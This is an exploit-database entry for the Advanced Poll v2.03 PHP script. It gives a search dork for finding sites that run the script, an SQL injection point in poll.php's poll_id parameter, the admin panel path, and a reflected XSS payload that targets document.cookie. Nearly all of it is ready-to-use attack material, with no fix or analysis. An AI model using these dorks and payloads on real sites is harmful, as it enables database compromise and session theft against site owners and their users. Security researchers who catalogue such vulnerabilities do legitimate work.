Advanced Poll v2.03 SQL / XSS Vulnerabilties

2012-06-07T00:00:00
ID 1337DAY-ID-18469
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2012-06-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Advanced Poll v2.03 Multiple Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [[email protected]]
.:. Script         : http://www.proxy2.de/
.:. Dork           : "Powered by Advanced Poll Version 2.03"
#######################################################################

===[ Exploit ]===


Sql Injection
==============

http://SITE/poll.php?poll_id=31[sql]

Admin Panel:

http://SITE/admin/

Reflected Xss
==============


http://SITE/poll.php?poll_id='"<script>alert(document.cookie)</script>

####################################################################### 



#  0day.today [2018-04-09]  #